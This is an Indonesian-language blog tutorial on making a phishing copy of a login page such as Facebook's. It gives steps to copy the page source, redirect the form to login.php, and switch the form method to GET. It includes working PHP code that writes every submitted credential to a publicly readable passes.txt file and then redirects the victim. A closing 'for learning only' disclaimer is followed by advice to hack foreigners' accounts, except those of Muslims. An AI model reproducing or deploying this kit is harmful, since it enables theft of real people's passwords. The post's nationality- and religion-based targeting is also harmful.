Phising, yang berasal dari kata fishing yang diartikan dalam bahasa indonesia artinya memancing. Benar ! teknik metodhe ini tidak asing lagi bagi para hacker yang ingin mengetahui identitas korbannya. Akan tetapi phising ini juga bisa disediakan dalam bentuk website yang sebagai manipulasi ( fake ).
1. Pertama kunjungi dan lihat source code situs yang ingin dibuat jebakan phising (Ex : facebook, paypal, yahoo, etc ) lalu lihat source codenya (Ctrl + U ) atau klik kanan mouse lalu pilih view source itu pun kalau mozilla & Chrome, Entah apa kalau memakai browser yang lain :) . Lihat Gambar dibawah untuk lebih jelasnya :
2. Lalu copy dan pastekan di notepad, kemudian Save file tersebut dengan nama " index.htm atau index.html " .
3. Selanjutnya kita mengedit bagian source dengan langkah - langkah :
- Cari code " action= " (Ctrl + F untuk mencari ) lalu hapus alamat asli facebook dan ganti dengan " /login.php " ( Untuk direct ) .
- Dan ganti metodhenya dari " post " menjadi "get " .Lihat Gambar dibawah ini !
<?php
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Seperti gambar dibawah ini :
Keterangan :
- http://www.google.com alamat yang akan muncul ketika sesi login selanjutnya. Bisa diedit misalnya : http://facebook.com, yahoo.com, dll
- passes.txt , untuk melihat password dengan melalui url . Ex : http://domainkalian.com/passes.txt
Semoga bermanfaat bagi kalian. Ingat ! ini hanya untuk pembelajaran bukan untuk kejahatan, kalau misalkan mau akun facebook ,rentaslah milik orang luar negeri (kecuali bangsa muslim) dari pada dalam negeri karena itu menghancurkan bangsa sendiri dan agama melalui hacking. Wasalamu'alaikum Wr. Wb .
EmoticonEmoticon